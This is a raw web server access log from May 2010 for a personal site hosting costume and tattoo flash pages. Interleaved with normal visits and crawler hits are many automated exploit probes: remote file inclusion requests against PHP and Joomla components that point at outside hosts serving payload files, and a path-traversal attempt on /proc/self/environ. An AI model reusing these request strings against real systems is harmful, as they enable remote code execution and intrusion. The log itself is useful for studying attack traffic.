125.165.81.212 - - [06/May/2010:11:21:53 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:21:53 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:21:54 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:21:54 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:21:54 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:21:54 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:21:55 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:21:57 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:22:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
114.108.151.149 - - [06/May/2010:11:23:36 -0500] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:11:23:36 -0500] "GET /logs/access_log.1262822400//micro_cms_files/microcms-include.php?microcms_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:11:23:36 -0500] "GET //micro_cms_files/microcms-include.php?microcms_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [06/May/2010:11:26:12 -0500] "GET /logs/access_log.1166140800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.92 - - [06/May/2010:11:32:52 -0500] "GET /logs/access_log.1211846400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.201.34.227 - - [06/May/2010:11:35:39 -0500] "GET /logs/access_log.1221782400//index.php?option=com_mmsblog&controller=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
67.201.34.227 - - [06/May/2010:11:35:39 -0500] "GET //index.php?option=com_mmsblog&controller=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
67.201.34.227 - - [06/May/2010:11:35:40 -0500] "GET /logs//index.php?option=com_mmsblog&controller=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.76.97.60 - - [06/May/2010:11:36:09 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
91.76.97.60 - - [06/May/2010:11:36:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
91.76.97.60 - - [06/May/2010:11:36:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
75.5.249.170 - - [06/May/2010:11:38:39 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=23&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3DBert%2BGrimm%2BTattoo%2BFlash%26start%3D20%26um%3D1%26hl%3Den%26sa%3DN%26ndsp%3D20%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
75.5.249.170 - - [06/May/2010:11:38:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tat-cd1.jpg""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
66.221.63.33 - - [06/May/2010:11:38:46 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 282 "-""Mozilla/5.0"
66.221.63.33 - - [06/May/2010:11:38:46 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 287 "-""Mozilla/5.0"
66.221.63.33 - - [06/May/2010:11:38:46 -0500] "GET /logs/access_log.1263254400//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 309 "-""Mozilla/5.0"
66.221.63.33 - - [06/May/2010:11:38:46 -0500] "GET /logs/access_log.1263513600//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 309 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:11:38:57 -0500] "GET /logs/access_log.1270252800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.28.102.242 - - [06/May/2010:11:44:42 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.28.102.242 - - [06/May/2010:11:44:42 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.28.102.242 - - [06/May/2010:11:44:42 -0500] "GET /logs/access_log.1263254400//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.28.102.242 - - [06/May/2010:11:44:42 -0500] "GET /logs/access_log.1263513600//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.141.2.7 - - [06/May/2010:11:45:08 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.141.2.7 - - [06/May/2010:11:45:08 -0500] "GET /logs/access_log.1263513600//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.141.2.7 - - [06/May/2010:11:45:08 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.141.2.7 - - [06/May/2010:11:45:08 -0500] "GET /logs/access_log.1263254400//index.php?option=com_akolegal&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:47:26 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:47:26 -0500] "GET /logs/access_log.1263254400//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:47:26 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:47:26 -0500] "GET /logs/access_log.1263513600//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.218.116.164 - - [06/May/2010:11:48:49 -0500] "GET /logs/access_log.1206230400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:11:50:07 -0500] "GET /logs/access_log.1248912000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.26.122.245 - - [06/May/2010:11:55:34 -0500] "GET /logs/access_log.1262736000//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.26.122.245 - - [06/May/2010:11:55:34 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
72.26.122.245 - - [06/May/2010:11:55:34 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.26.122.245 - - [06/May/2010:11:55:40 -0500] "GET /logs/access_log.1262736000//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.26.122.245 - - [06/May/2010:11:55:40 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.26.122.245 - - [06/May/2010:11:55:40 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:59:45 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:59:45 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:59:45 -0500] "GET /logs/access_log.1262736000//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:59:47 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:59:47 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:11:59:48 -0500] "GET /logs/access_log.1262736000//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:12:01:46 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:12:01:46 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.174.28.46 - - [06/May/2010:12:01:46 -0500] "GET /logs/access_log.1262736000//index.php?option=com_akolegal&mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.129.119.10 - - [06/May/2010:12:04:46 -0500] "GET /logs/access_log.1248480000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
114.108.151.149 - - [06/May/2010:12:04:47 -0500] "GET /logs/bad_link.php?theme_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:12:04:47 -0500] "GET /logs/access_log.1268956800/bad_link.php?theme_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:12:04:47 -0500] "GET /bad_link.php?theme_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.218.116.163 - - [06/May/2010:12:05:16 -0500] "GET /logs/access_log.1244246400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
114.108.151.149 - - [06/May/2010:12:05:53 -0500] "GET /logs/bad_link.php?theme_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:12:05:53 -0500] "GET /bad_link.php?theme_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:12:05:53 -0500] "GET /logs/access_log.1268956800/bad_link.php?theme_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:12:07:21 -0500] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:12:07:21 -0500] "GET /setup.php?setup[use_category]=1&dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:12:07:21 -0500] "GET /logs/access_log.1262476800/setup.php?setup[use_category]=1&dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.195.112.180 - - [06/May/2010:12:07:50 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.34.19 - - [06/May/2010:12:08:32 -0500] "GET /logs/access_log.1262995200/setup.php?setup[use_category]=1&dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.247.204.35 - - [06/May/2010:12:13:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
61.247.204.35 - - [06/May/2010:12:13:02 -0500] "GET / HTTP/1.1" 200 1003 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
216.65.3.71 - - [06/May/2010:12:13:31 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bbworlds.com/userfiles/id2.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.65.3.71 - - [06/May/2010:12:13:31 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bbworlds.com/userfiles/id2.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.65.3.71 - - [06/May/2010:12:13:38 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bbworlds.com/userfiles/id2.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.218.116.134 - - [06/May/2010:12:14:48 -0500] "GET /logs/access_log.1241395200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:12:14:48 -0500] "GET /logs/access_log.1271980800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
132.183.105.127 - - [06/May/2010:12:16:28 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.com/search?hl=en&safe=active&q=lady+dress+from+1100+AD&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
132.183.105.127 - - [06/May/2010:12:16:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
132.183.105.127 - - [06/May/2010:12:16:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
87.250.255.243 - - [06/May/2010:12:21:46 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.134 - - [06/May/2010:12:23:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:12:25:03 -0500] "GET /artwork/toys.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
217.16.18.219 - - [06/May/2010:12:28:05 -0500] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.218.116.132 - - [06/May/2010:12:28:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
212.227.66.249 - - [06/May/2010:12:29:02 -0500] "GET /!rfihttp://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
87.250.255.243 - - [06/May/2010:12:31:14 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.97 - - [06/May/2010:12:31:22 -0500] "GET /logs/access_log.1260403200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.227.66.249 - - [06/May/2010:12:31:28 -0500] "GET /logs/access_log.1266364800!rfihttp://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
212.227.66.249 - - [06/May/2010:12:31:28 -0500] "GET /!rfihttp://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
212.227.66.249 - - [06/May/2010:12:31:28 -0500] "GET /logs/!rfihttp://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
212.227.66.249 - - [06/May/2010:12:31:51 -0500] "GET /logs/access_log.1264118400!rfihttp://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
67.218.116.133 - - [06/May/2010:12:32:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.130 - - [06/May/2010:12:32:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.145.93.201 - - [06/May/2010:12:33:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/search?q=1950%20flash%20tatoos&form=HPNTLB""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:45 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:56 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:33:57 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
